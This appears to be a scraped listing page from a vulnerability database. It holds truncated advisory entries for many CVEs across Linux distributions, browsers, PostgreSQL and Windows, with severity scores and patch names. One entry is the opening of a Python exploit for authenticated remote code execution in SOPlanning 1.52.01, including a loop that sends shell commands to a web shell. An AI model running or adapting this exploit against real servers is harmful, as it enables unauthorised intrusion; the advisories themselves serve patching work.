?day POC 漏洞数据库

Oracle Linux: CVE-2023-28101: ELSA-2023-6518:flatpak security, bug fix, and enhancement update (MODERATE) (Multiple Advisories) Severity 5 CVSS (AV:L/AC:L/Au:N/C:C/I:N/A:N) Published 03/16/2023 Created 11/24/2023 Added 11/22/2023 Modified 11/28/2024 Description Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4, if an attacker publishes a Flatpak app with elevated permissions, they can hide those permissions from users of the `flatpak(1)` command-line interface by setting other permissions to crafted values that contain non-printable control cha…

VMware Photon OS: CVE-2022-3294 Severity 7 CVSS (AV:N/AC:H/Au:M/C:C/I:C/A:C) Published 03/01/2023 Created 01/21/2025 Added 01/20/2025 Modified 02/04/2025 Description Users may have access to secure endpoints in the control plane network. Kubernetes clusters are only affected if an untrusted user can modify Node objects and send proxy requests to them. Kubernetes supports node proxying, which allows clients of kube-apiserver to access endpoints of a Kubelet to establish connections to Pods, retrieve container logs, and more. While Kubernetes already validates the proxying address for Nodes, a bug in kube-apiserver made it possible to bypass this vali…

SUSE: CVE-2023-23006: SUSE Linux Security Advisory Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 03/01/2023 Created 03/22/2023 Added 03/20/2023 Modified 01/28/2025 Description In the Linux kernel before 5.15.13, drivers/net/ethernet/mellanox/mlx5/core/steering/dr_domain.c misinterprets the mlx5_get_uars_page return value (expects it to be NULL in the error case, whereas it is actually an error pointer). Solution(s) suse-upgrade-cluster-md-kmp-64kb suse-upgrade-cluster-md-kmp-azure suse-upgrade-cluster-md-kmp-default suse-upgrade-cluster-md-kmp-rt suse-upgrade-dlm-kmp-64kb suse-upgrade-dlm-kmp-azure suse-upgrade-dlm-kmp-defa…

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

CentOS Linux: CVE-2023-25358: Important: webkit2gtk3 security and bug fix update (Multiple Advisories) Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/02/2023 Created 05/15/2023 Added 05/15/2023 Modified 01/28/2025 Description A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely. Solution(s) centos-upgrade-webkit2gtk3 centos-upgrade-webkit2gtk3-debuginfo centos-upgrade-webkit2gtk3-debugsource centos-upgrade-webkit2gtk3-devel centos-upgrade-webkit2gtk3-devel-debuginfo centos-upgrade-webkit2gtk3-jsc centos-upgrade-webkit2gtk3-jsc-debuginfo cento…

Debian: CVE-2023-25358: webkit2gtk, wpewebkit -- security update Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/02/2023 Created 03/08/2023 Added 03/07/2023 Modified 01/28/2025 Description A use-after-free vulnerability in WebCore::RenderLayer::addChild in WebKitGTK before 2.36.8 allows attackers to execute code remotely. Solution(s) debian-upgrade-webkit2gtk debian-upgrade-wpewebkit References https://attackerkb.com/topics/cve-2023-25358 CVE - 2023-25358 DLA-3124-1 DSA-5240-1 DSA-5241-1

Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0997 CVE - 2025-0997

Red Hat: CVE-2022-27672: kernel: AMD: Cross-Thread Return Address Predictions (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:S/C:C/I:N/A:N) Published 03/01/2023 Created 11/23/2023 Added 11/22/2023 Modified 01/28/2025 Description When SMT is enabled, certain AMD processors may speculatively execute instructions using a target from the sibling thread after an SMT mode switch potentially resulting in information disclosure. Solution(s) redhat-upgrade-kernel redhat-upgrade-kernel-rt References CVE-2022-27672 RHSA-2023:7370 RHSA-2023:7379

Microsoft Edge Chromium: CVE-2023-1532 Out of bounds read in GPU Video Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 03/27/2023 Added 03/27/2023 Modified 01/28/2025 Description Out of bounds read in GPU Video in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2023-1532 CVE - 2023-1532 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-1532

Debian: CVE-2023-28487: sudo -- security update Severity 5 CVSS (AV:N/AC:L/Au:N/C:P/I:N/A:N) Published 03/16/2023 Created 02/06/2024 Added 02/05/2024 Modified 01/28/2025 Description Sudo before 1.9.13 does not escape control characters in sudoreplay output. Solution(s) debian-upgrade-sudo References https://attackerkb.com/topics/cve-2023-28487 CVE - 2023-28487 DLA-3732-1

PostgreSQL: CVE-2025-1094: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation Severity 8 CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/14/2025 Description Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, i…

Red Hat: CVE-2023-28101: flatpak: Metadata with ANSI control codes can cause misleading terminal output (Multiple Advisories) Severity 4 CVSS (AV:N/AC:L/Au:S/C:N/I:P/A:N) Published 03/16/2023 Created 11/09/2023 Added 11/08/2023 Modified 01/28/2025 Description Flatpak is a system for building, distributing, and running sandboxed desktop applications on Linux. In versions prior to 1.10.8, 1.12.8, 1.14.4, and 1.15.4, if an attacker publishes a Flatpak app with elevated permissions, they can hide those permissions from users of the `flatpak(1)` command-line interface by setting other permissions to crafted values that contain non-printable control cha…

Huawei EulerOS: CVE-2023-27561: docker-runc security update Severity 7 CVSS (AV:L/AC:M/Au:S/C:C/I:C/A:C) Published 03/03/2023 Created 05/10/2023 Added 05/09/2023 Modified 01/28/2025 Description runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression. Solution(s) huawei-euleros-2_0_sp10-upgrade-docker-runc References https://attackerkb.com/topics/cve-2…

Debian: CVE-2025-21694: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix softlockup in __read_vmcore (part 2) Since commit 5cbcb62dddf5 ("fs/proc: fix softlockup in __read_vmcore") the number of softlockups in __read_vmcore at kdump time have gone down, but they still happen sometimes. In a memory constrained environment like the kdump image, a softlockup is not just a harmless message, but it can interfere with things like RCU freeing memory, causing the c…

Debian: CVE-2021-47413: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 05/21/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/30/2025 Description In the Linux kernel, the following vulnerability has been resolved: usb: chipidea: ci_hdrc_imx: Also search for 'phys' phandle When passing 'phys' in the devicetree to describe the USB PHY phandle (which is the recommended way according to Documentation/devicetree/bindings/usb/ci-hdrc-usb2.txt) the following NULL pointer dereference is observed on i.MX7 and i.MX8MM: [1.489344] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000098 [1.4…

Debian: CVE-2025-21699: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: gfs2: Truncate address space when flipping GFS2_DIF_JDATA flag Truncate an inode's address space when flipping the GFS2_DIF_JDATA flag: depending on that flag, the pages in the address space will either use buffer heads or iomap_folio_state structs, and we cannot mix the two. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2025-21699 CVE - 20…

Ubuntu: (Multiple Advisories) (CVE-2024-42415): libgsf vulnerabilities Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 10/03/2024 Created 10/12/2024 Added 10/11/2024 Modified 01/28/2025 Description An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. Solution(s)…

Microsoft Edge Chromium: CVE-2023-1529 Out of bounds memory access in WebHID Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 03/27/2023 Added 03/27/2023 Modified 01/28/2025 Description Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High) Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2023-1529 CVE - 2023-1529 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-1529

Ubuntu: (CVE-2021-47426): linux vulnerability Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 05/21/2024 Created 11/21/2024 Added 11/19/2024 Modified 02/11/2025 Description In the Linux kernel, the following vulnerability has been resolved: bpf, s390: Fix potential memory leak about jit_data Make sure to free jit_data through kfree() in the error path. Solution(s) ubuntu-upgrade-linux ubuntu-upgrade-linux-aws ubuntu-upgrade-linux-aws-5-4 ubuntu-upgrade-linux-aws-fips ubuntu-upgrade-linux-azure ubuntu-upgrade-linux-azure-5-4 ubuntu-upgrade-linux-azure-fips ubuntu-upgrade-linux-bluefield ubuntu-upgrade-linux-fips ubuntu-upgra…

Debian: CVE-2021-47617: linux -- security update Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 06/20/2024 Created 07/31/2024 Added 07/30/2024 Modified 01/30/2025 Description In the Linux kernel, the following vulnerability has been resolved: PCI: pciehp: Fix infinite loop in IRQ handler upon power fault The Power Fault Detected bit in the Slot Status register differs from all other hotplug events in that it is sticky:It can only be cleared after turning off slot power.Per PCIe r5.0, sec. 6.7.1.8: If a power controller detects a main power fault on the hot-plug slot, it must automatically set its internal main power fault latch [...]. T…

Ubuntu: USN-6021-1 (CVE-2023-1534): Chromium vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 05/05/2023 Added 04/17/2023 Modified 01/28/2025 Description Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) ubuntu-upgrade-chromium-browser References https://attackerkb.com/topics/cve-2023-1534 CVE - 2023-1534 USN-6021-1

Debian: CVE-2025-21697: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Ensure job pointer is set to NULL after job completion After a job completes, the corresponding pointer in the device must be set to NULL. Failing to do so triggers a warning when unloading the driver, as it appears the job is still active. To prevent this, assign the job pointer to NULL after completing the job, indicating the job has finished. Solution(s) debian-upgrade-lin…

Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Severity 6 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb50…

SUSE: CVE-2023-1195: SUSE Linux Security Advisory Severity 5 CVSS (AV:L/AC:L/Au:S/C:N/I:N/A:C) Published 03/16/2023 Created 03/22/2023 Added 03/20/2023 Modified 01/28/2025 Description A use-after-free flaw was found in reconn_set_ipaddr_from_hostname in fs/cifs/connect.c in the Linux kernel. The issue occurs when it forgets to set the free pointer server->hostname to NULL, leading to an invalid pointer request. Solution(s) suse-upgrade-kernel-rt References https://attackerkb.com/topics/cve-2023-1195 CVE - 2023-1195

Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Severity 6 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Solution(s) office-click-to-run-upgrade-latest References https://attackerkb.com/topics/cve-2025-21397 CVE - 2025-21397